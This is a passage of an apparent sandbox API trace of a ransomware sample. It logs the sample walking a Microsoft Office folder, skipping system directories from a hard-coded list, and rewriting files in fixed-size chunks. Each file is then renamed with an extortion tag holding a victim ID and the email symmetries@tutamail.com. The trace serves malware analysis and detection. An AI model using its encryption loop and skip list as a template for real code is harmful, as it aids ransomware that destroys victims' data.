[0142.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0142.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.688] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PULQOT98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pulqot98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PULQOT98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pulqot98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0142.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0142.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0142.689] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233f5084, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233f5084, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23441541, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d1db, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="QP.DPV", cAlternateFileName="")) returned 1 [0142.689] lstrcmpiW (lpString1="QP.DPV", lpString2=".") returned 1 [0142.689] lstrcmpiW (lpString1="QP.DPV", lpString2="..") returned 1 [0142.689] lstrcmpiW (lpString1="QP.DPV", lpString2="...") returned 1 [0142.689] lstrcmpiW (lpString1="QP.DPV", lpString2="windows") returned -1 [0142.689] lstrcmpiW (lpString1="QP.DPV", lpString2="recovery") returned -1 [0142.689] lstrcmpiW (lpString1="QP.DPV", lpString2="perflogs") returned 1 [0142.689] lstrcmpiW (lpString1="QP.DPV", lpString2="documents and settings") returned 1 [0142.689] lstrcmpiW (lpString1="QP.DPV", lpString2="$RECYCLE.BIN") returned 1 [0142.689] lstrcmpiW (lpString1="QP.DPV", lpString2="system volume information") returned -1 [0142.689] lstrcmpiW (lpString1="QP.DPV", lpString2="msocache") returned 1 [0142.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QP.DPV", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0142.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QP.DPV", cchWideChar=6, lpMultiByteStr=0x345ebd8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QP.DPV", lpUsedDefaultChar=0x0) returned 6 [0142.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QP.DPV", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0142.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QP.DPV", cchWideChar=6, lpMultiByteStr=0x345eba8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QP.DPV", lpUsedDefaultChar=0x0) returned 6 [0142.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0142.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0142.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0142.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\QP.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\qp.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.690] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=578011) returned 1 [0142.690] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0142.690] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.702] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.702] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0142.703] CloseHandle (hObject=0x238) returned 1 [0142.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0142.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0142.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.916] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\QP.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\qp.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\QP.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\qp.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.918] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23441541, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23441541, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23441541, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33e6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="QP.XML", cAlternateFileName="")) returned 1 [0142.918] lstrcmpiW (lpString1="QP.XML", lpString2=".") returned 1 [0142.918] lstrcmpiW (lpString1="QP.XML", lpString2="..") returned 1 [0142.918] lstrcmpiW (lpString1="QP.XML", lpString2="...") returned 1 [0142.918] lstrcmpiW (lpString1="QP.XML", lpString2="windows") returned -1 [0142.918] lstrcmpiW (lpString1="QP.XML", lpString2="recovery") returned -1 [0142.918] lstrcmpiW (lpString1="QP.XML", lpString2="perflogs") returned 1 [0142.918] lstrcmpiW (lpString1="QP.XML", lpString2="documents and settings") returned 1 [0142.918] lstrcmpiW (lpString1="QP.XML", lpString2="$RECYCLE.BIN") returned 1 [0142.918] lstrcmpiW (lpString1="QP.XML", lpString2="system volume information") returned -1 [0142.918] lstrcmpiW (lpString1="QP.XML", lpString2="msocache") returned 1 [0142.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QP.XML", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0142.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QP.XML", cchWideChar=6, lpMultiByteStr=0x345ebd8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QP.XML", lpUsedDefaultChar=0x0) returned 6 [0142.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QP.XML", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0142.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QP.XML", cchWideChar=6, lpMultiByteStr=0x345eba8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QP.XML", lpUsedDefaultChar=0x0) returned 6 [0142.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\QP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\qp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.920] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13286) returned 1 [0142.920] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.920] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x33e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x33e0, lpOverlapped=0x0) returned 1 [0142.922] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.923] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x33e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x33e0, lpOverlapped=0x0) returned 1 [0142.923] CloseHandle (hObject=0x238) returned 1 [0142.923] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\QP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\qp.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\QP.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\qp.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.924] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2341b2ec, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2341b2ec, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23467797, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6f882, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="QUIKPUBS.POC", cAlternateFileName="")) returned 1 [0142.924] lstrcmpiW (lpString1="QUIKPUBS.POC", lpString2=".") returned 1 [0142.924] lstrcmpiW (lpString1="QUIKPUBS.POC", lpString2="..") returned 1 [0142.924] lstrcmpiW (lpString1="QUIKPUBS.POC", lpString2="...") returned 1 [0142.924] lstrcmpiW (lpString1="QUIKPUBS.POC", lpString2="windows") returned -1 [0142.924] lstrcmpiW (lpString1="QUIKPUBS.POC", lpString2="recovery") returned -1 [0142.924] lstrcmpiW (lpString1="QUIKPUBS.POC", lpString2="perflogs") returned 1 [0142.924] lstrcmpiW (lpString1="QUIKPUBS.POC", lpString2="documents and settings") returned 1 [0142.924] lstrcmpiW (lpString1="QUIKPUBS.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.924] lstrcmpiW (lpString1="QUIKPUBS.POC", lpString2="system volume information") returned -1 [0142.924] lstrcmpiW (lpString1="QUIKPUBS.POC", lpString2="msocache") returned 1 [0142.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QUIKPUBS.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QUIKPUBS.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QUIKPUBS.POC", lpUsedDefaultChar=0x0) returned 12 [0142.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QUIKPUBS.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QUIKPUBS.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QUIKPUBS.POC", lpUsedDefaultChar=0x0) returned 12 [0142.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\QUIKPUBS.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\quikpubs.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.925] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=456834) returned 1 [0142.925] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.925] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.936] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.936] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.937] CloseHandle (hObject=0x238) returned 1 [0142.937] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\QUIKPUBS.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\quikpubs.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\QUIKPUBS.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\quikpubs.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.938] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23467797, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23467797, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x235000fc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4d57e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="REPTWIZ.POC", cAlternateFileName="")) returned 1 [0142.938] lstrcmpiW (lpString1="REPTWIZ.POC", lpString2=".") returned 1 [0142.938] lstrcmpiW (lpString1="REPTWIZ.POC", lpString2="..") returned 1 [0142.938] lstrcmpiW (lpString1="REPTWIZ.POC", lpString2="...") returned 1 [0142.938] lstrcmpiW (lpString1="REPTWIZ.POC", lpString2="windows") returned -1 [0142.938] lstrcmpiW (lpString1="REPTWIZ.POC", lpString2="recovery") returned 1 [0142.938] lstrcmpiW (lpString1="REPTWIZ.POC", lpString2="perflogs") returned 1 [0142.938] lstrcmpiW (lpString1="REPTWIZ.POC", lpString2="documents and settings") returned 1 [0142.938] lstrcmpiW (lpString1="REPTWIZ.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.938] lstrcmpiW (lpString1="REPTWIZ.POC", lpString2="system volume information") returned -1 [0142.938] lstrcmpiW (lpString1="REPTWIZ.POC", lpString2="msocache") returned 1 [0142.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPTWIZ.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPTWIZ.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REPTWIZ.POC", lpUsedDefaultChar=0x0) returned 11 [0142.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPTWIZ.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPTWIZ.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REPTWIZ.POC", lpUsedDefaultChar=0x0) returned 11 [0142.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\REPTWIZ.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\reptwiz.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.939] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=316798) returned 1 [0142.939] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.939] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.951] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.951] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.951] CloseHandle (hObject=0x238) returned 1 [0142.951] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\REPTWIZ.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\reptwiz.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\REPTWIZ.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\reptwiz.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.953] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23467797, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23467797, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23467797, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5df4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="RES98.POC", cAlternateFileName="")) returned 1 [0142.953] lstrcmpiW (lpString1="RES98.POC", lpString2=".") returned 1 [0142.953] lstrcmpiW (lpString1="RES98.POC", lpString2="..") returned 1 [0142.953] lstrcmpiW (lpString1="RES98.POC", lpString2="...") returned 1 [0142.953] lstrcmpiW (lpString1="RES98.POC", lpString2="windows") returned -1 [0142.953] lstrcmpiW (lpString1="RES98.POC", lpString2="recovery") returned 1 [0142.953] lstrcmpiW (lpString1="RES98.POC", lpString2="perflogs") returned 1 [0142.953] lstrcmpiW (lpString1="RES98.POC", lpString2="documents and settings") returned 1 [0142.953] lstrcmpiW (lpString1="RES98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.953] lstrcmpiW (lpString1="RES98.POC", lpString2="system volume information") returned -1 [0142.953] lstrcmpiW (lpString1="RES98.POC", lpString2="msocache") returned 1 [0142.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RES98.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0142.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RES98.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RES98.POC", lpUsedDefaultChar=0x0) returned 9 [0142.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RES98.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0142.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RES98.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RES98.POC", lpUsedDefaultChar=0x0) returned 9 [0142.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RES98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\res98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.980] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24052) returned 1 [0142.980] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.980] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5df0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x5df0, lpOverlapped=0x0) returned 1 [0143.004] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.005] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5df0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x5df0, lpOverlapped=0x0) returned 1 [0143.005] CloseHandle (hObject=0x238) returned 1 [0143.005] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 